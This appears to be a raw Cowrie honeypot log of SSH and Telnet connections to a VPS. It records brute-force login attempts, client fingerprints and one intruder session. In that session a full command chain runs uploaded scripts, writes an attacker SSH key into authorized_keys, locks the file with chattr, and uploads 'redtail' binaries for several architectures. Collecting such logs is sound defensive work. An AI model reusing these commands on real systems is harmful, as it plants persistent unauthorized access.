cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 19532158b559096b89b1a5f7d17175b2","sensor":"my-vps","timestamp":"2025-09-09T00:07:47.508240Z","src_ip":"212.227.235.229","session":"8c53d3eb2953"}
{"eventid":"cowrie.login.success","username":"root","password":"zxcvBNM<>?","message":"login attempt [root/zxcvBNM<>?] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:07:48.115725Z","src_ip":"212.227.235.229","session":"8c53d3eb2953"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:07:48.327082Z","src_ip":"212.227.235.229","session":"8c53d3eb2953"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44180,"dst_ip":"1.2.3.4","dst_port":22,"session":"7ae097a9a980","protocol":"ssh","message":"New connection: 212.227.235.229:44180 (1.2.3.4:22) [session: 7ae097a9a980]","sensor":"my-vps","timestamp":"2025-09-09T00:07:48.504915Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T00:07:48.505732Z","src_ip":"212.227.235.229","session":"7ae097a9a980"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-09-09T00:07:48.614625Z","src_ip":"212.227.235.229","session":"7ae097a9a980"}
{"eventid":"cowrie.login.success","username":"root","password":"zxcvBNM<>?","message":"login attempt [root/zxcvBNM<>?] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:07:48.940615Z","src_ip":"212.227.235.229","session":"7ae097a9a980"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:08:12.389890Z","src_ip":"212.227.235.229","session":"7ae097a9a980"}
{"eventid":"cowrie.command.input","input":"chmod +x clean.sh; sh clean.sh; rm -rf clean.sh; chmod +x setup.sh; sh setup.sh; rm -rf setup.sh; mkdir -p ~/.ssh; chattr -ia ~/.ssh/authorized_keys; echo \"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK216q0q/7neNVqm7AgvfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv66I5yuZTEaDAG6cPXxg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96hu1GthAMtPAFahqxrvaRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWpO2xF6tzfdmHbiVdSmdw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtBEk9rGpgBnJ1hcEUslEf/zevIcX8+6H7kUMRr rsa-key-20230629\" > ~/.ssh/authorized_keys; chattr +ai ~/.ssh/authorized_keys; uname -a; echo -e \"\\x61\\x75\\x74\\x68\\x5F\\x6F\\x6B\\x0A\"","message":"CMD: chmod +x clean.sh; sh clean.sh; rm -rf clean.sh; chmod +x setup.sh; sh setup.sh; rm -rf setup.sh; mkdir -p ~/.ssh; chattr -ia ~/.ssh/authorized_keys; echo \"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK216q0q/7neNVqm7AgvfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv66I5yuZTEaDAG6cPXxg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96hu1GthAMtPAFahqxrvaRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWpO2xF6tzfdmHbiVdSmdw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtBEk9rGpgBnJ1hcEUslEf/zevIcX8+6H7kUMRr rsa-key-20230629\" > ~/.ssh/authorized_keys; chattr +ai ~/.ssh/authorized_keys; uname -a; echo -e \"\\x61\\x75\\x74\\x68\\x5F\\x6F\\x6B\\x0A\"","sensor":"my-vps","timestamp":"2025-09-09T00:08:12.391300Z","src_ip":"212.227.235.229","session":"7ae097a9a980"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4a869e4a816476f12d5cd6aab0625c5f6aab97714a486f6b8a5f484cbc8981f6","size":80,"shasum":"4a869e4a816476f12d5cd6aab0625c5f6aab97714a486f6b8a5f484cbc8981f6","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/4a869e4a816476f12d5cd6aab0625c5f6aab97714a486f6b8a5f484cbc8981f6 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:08:12.501480Z","src_ip":"212.227.235.229","session":"7ae097a9a980"}
{"eventid":"cowrie.session.file_upload","filename":"clean.sh","outfile":"var/lib/cowrie/downloads/d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e","shasum":"d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e","message":"SFTP Uploaded file \"clean.sh\" to var/lib/cowrie/downloads/d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e","sensor":"my-vps","timestamp":"2025-09-09T00:08:12.609969Z","src_ip":"212.227.235.229","session":"7ae097a9a980"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.arm7","outfile":"var/lib/cowrie/downloads/229496b55d0668a40fe3d969ba4e942dc2c2fd7452b3d6f79c6beb0db631dc12","shasum":"229496b55d0668a40fe3d969ba4e942dc2c2fd7452b3d6f79c6beb0db631dc12","message":"SFTP Uploaded file \"redtail.arm7\" to var/lib/cowrie/downloads/229496b55d0668a40fe3d969ba4e942dc2c2fd7452b3d6f79c6beb0db631dc12","sensor":"my-vps","timestamp":"2025-09-09T00:08:12.612112Z","src_ip":"212.227.235.229","session":"7ae097a9a980"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.arm8","outfile":"var/lib/cowrie/downloads/89782d8142297907c9962eebdae29c28df86805a99f38a683ab55c8fa1596dd8","shasum":"89782d8142297907c9962eebdae29c28df86805a99f38a683ab55c8fa1596dd8","message":"SFTP Uploaded file \"redtail.arm8\" to var/lib/cowrie/downloads/89782d8142297907c9962eebdae29c28df86805a99f38a683ab55c8fa1596dd8","sensor":"my-vps","timestamp":"2025-09-09T00:08:12.614424Z","src_ip":"212.227.235.229","session":"7ae097a9a980"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.i686","outfile":"var/lib/cowrie/downloads/ee7a31fb0d3c29ca435f08fd147a434c6db921b69d32c8894539a8199b0b15c0","shasum":"ee7a31fb0d3c29ca435f08fd147a434c6db921b69d32c8894539a8199b0b15c0","message":"SFTP Uploaded file \"redtail.i686\" to var/lib/cowrie/downloads/ee7a31fb0d3c29ca435f08fd147a434c6db921b69d32c8894539a8199b0b15c0","sensor":"my-vps","timestamp":"2025-09-09T00:08:12.616756Z","src_ip":"212.227.235.229","session":"7ae097a9a980"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.x86_64","outfile":"var/lib/cowrie/downloads/d6e0eb28cfe1b224f061eff0581091dac985516c78d222f4921587d2ec612010","shasum":"d6e0eb28cfe1b224f061eff0581091dac985516c78d222f4921587d2ec612010","message":"SFTP Uploaded file \"redtail.x86_64\" to var/lib/cowrie/downloads/d6e0eb28cfe1b224f061eff0581091dac985516c78d222f4921587d2ec612010","sensor":"my-vps","timestamp":"2025-09-09T00:08:12.619327Z","src_ip":"212.227.235.229","session":"7ae097a9a980"}
{"eventid":"cowrie.session.file_upload","filename":"setup.sh","outfile":"var/lib/cowrie/downloads/783adb7ad6b16fe9818f3e6d48b937c3ca1994ef24e50865282eeedeab7e0d59","shasum":"783adb7ad6b16fe9818f3e6d48b937c3ca1994ef24e50865282eeedeab7e0d59","message":"SFTP Uploaded file \"setup.sh\" to var/lib/cowrie/downloads/783adb7ad6b16fe9818f3e6d48b937c3ca1994ef24e50865282eeedeab7e0d59","sensor":"my-vps","timestamp":"2025-09-09T00:08:12.620353Z","src_ip":"212.227.235.229","session":"7ae097a9a980"}
{"eventid":"cowrie.session.closed","duration":"24.2","message":"Connection lost after 24.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:08:12.729968Z","src_ip":"212.227.235.229","session":"7ae097a9a980"}
{"eventid":"cowrie.session.connect","src_ip":"45.150.34.92","src_port":55296,"dst_ip":"1.2.3.4","dst_port":22,"session":"eb66adde6b34","protocol":"ssh","message":"New connection: 45.150.34.92:55296 (1.2.3.4:22) [session: eb66adde6b34]","sensor":"my-vps","timestamp":"2025-09-09T00:08:19.058856Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:08:19.059848Z","src_ip":"45.150.34.92","session":"eb66adde6b34"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:08:19.317255Z","src_ip":"45.150.34.92","session":"eb66adde6b34"}
{"eventid":"cowrie.login.failed","username":"fish","password":"qwerty","message":"login attempt [fish/qwerty] failed","sensor":"my-vps","timestamp":"2025-09-09T00:08:19.370530Z","src_ip":"45.150.34.92","session":"eb66adde6b34"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:08:20.391194Z","src_ip":"45.150.34.92","session":"eb66adde6b34"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":13618,"dst_ip":"1.2.3.4","dst_port":22,"session":"e6efb4188f15","protocol":"ssh","message":"New connection: 212.227.125.160:13618 (1.2.3.4:22) [session: e6efb4188f15]","sensor":"my-vps","timestamp":"2025-09-09T00:08:21.116680Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T00:08:21.388667Z","src_ip":"212.227.125.160","session":"e6efb4188f15"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-09T00:08:21.389345Z","src_ip":"212.227.125.160","session":"e6efb4188f15"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:08:22.330842Z","src_ip":"212.227.125.160","session":"e6efb4188f15"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":13620,"dst_ip":"1.2.3.4","dst_port":22,"session":"a89aa9d15cd9","protocol":"ssh","message":"New connection: 212.227.125.160:13620 (1.2.3.4:22) [session: a89aa9d15cd9]","sensor":"my-vps","timestamp":"2025-09-09T00:08:22.501861Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T00:08:22.781036Z","src_ip":"212.227.125.160","session":"a89aa9d15cd9"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-09T00:08:22.781744Z","src_ip":"212.227.125.160","session":"a89aa9d15cd9"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:08:23.714156Z","src_ip":"212.227.125.160","session":"a89aa9d15cd9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":13630,"dst_ip":"1.2.3.4","dst_port":22,"session":"b9e61a04f582","protocol":"ssh","message":"New connection: 212.227.125.160:13630 (1.2.3.4:22) [session: b9e61a04f582]","sensor":"my-vps","timestamp":"2025-09-09T00:08:23.903337Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T00:08:24.212585Z","src_ip":"212.227.125.160","session":"b9e61a04f582"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-09T00:08:24.213715Z","src_ip":"212.227.125.160","session":"b9e61a04f582"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:08:25.103233Z","src_ip":"212.227.125.160","session":"b9e61a04f582"}
{"eventid":"cowrie.session.connect","src_ip":"182.18.161.165","src_port":36278,"dst_ip":"1.2.3.4","dst_port":22,"session":"4ce1d2d958a9","protocol":"ssh","message":"New connection: 182.18.161.165:36278 (1.2.3.4:22) [session: 4ce1d2d958a9]","sensor":"my-vps","timestamp":"2025-09-09T00:08:56.241827Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:08:56.242902Z","src_ip":"182.18.161.165","session":"4ce1d2d958a9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:08:56.497820Z","src_ip":"182.18.161.165","session":"4ce1d2d958a9"}
{"eventid":"cowrie.login.failed","username":"supervisor","password":"changeme","message":"login attempt [supervisor/changeme] failed","sensor":"my-vps","timestamp":"2025-09-09T00:08:57.558088Z","src_ip":"182.18.161.165","session":"4ce1d2d958a9"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:08:58.815798Z","src_ip":"182.18.161.165","session":"4ce1d2d958a9"}
{"eventid":"cowrie.session.connect","src_ip":"172.236.228.39","src_port":52134,"dst_ip":"1.2.3.4","dst_port":22,"session":"7cb63c6e6235","protocol":"ssh","message":"New connection: 172.236.228.39:52134 (1.2.3.4:22) [session: 7cb63c6e6235]","sensor":"my-vps","timestamp":"2025-09-09T00:09:15.478489Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T00:09:15.811020Z","src_ip":"172.236.228.39","session":"7cb63c6e6235"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-09T00:09:15.811713Z","src_ip":"172.236.228.39","session":"7cb63c6e6235"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:09:16.864795Z","src_ip":"172.236.228.39","session":"7cb63c6e6235"}
{"eventid":"cowrie.session.connect","src_ip":"172.236.228.39","src_port":52150,"dst_ip":"1.2.3.4","dst_port":22,"session":"ba494f1fcb08","protocol":"ssh","message":"New connection: 172.236.228.39:52150 (1.2.3.4:22) [session: ba494f1fcb08]","sensor":"my-vps","timestamp":"2025-09-09T00:09:17.030254Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T00:09:17.351381Z","src_ip":"172.236.228.39","session":"ba494f1fcb08"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-09T00:09:17.352156Z","src_ip":"172.236.228.39","session":"ba494f1fcb08"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:09:18.415603Z","src_ip":"172.236.228.39","session":"ba494f1fcb08"}
{"eventid":"cowrie.session.connect","src_ip":"172.236.228.39","src_port":52158,"dst_ip":"1.2.3.4","dst_port":22,"session":"f054a2ee941e","protocol":"ssh","message":"New connection: 172.236.228.39:52158 (1.2.3.4:22) [session: f054a2ee941e]","sensor":"my-vps","timestamp":"2025-09-09T00:09:18.595531Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T00:09:18.932197Z","src_ip":"172.236.228.39","session":"f054a2ee941e"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-09T00:09:18.933034Z","src_ip":"172.236.228.39","session":"f054a2ee941e"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:09:19.913892Z","src_ip":"172.236.228.39","session":"f054a2ee941e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42417,"dst_ip":"1.2.3.4","dst_port":23,"session":"c2d05c81c14c","protocol":"telnet","message":"New connection: 212.227.125.160:42417 (1.2.3.4:23) [session: c2d05c81c14c]","sensor":"my-vps","timestamp":"2025-09-09T00:09:45.246568Z"}
{"eventid":"cowrie.session.closed","duration":2.00081467628479,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:09:47.247291Z","src_ip":"212.227.125.160","session":"c2d05c81c14c"}
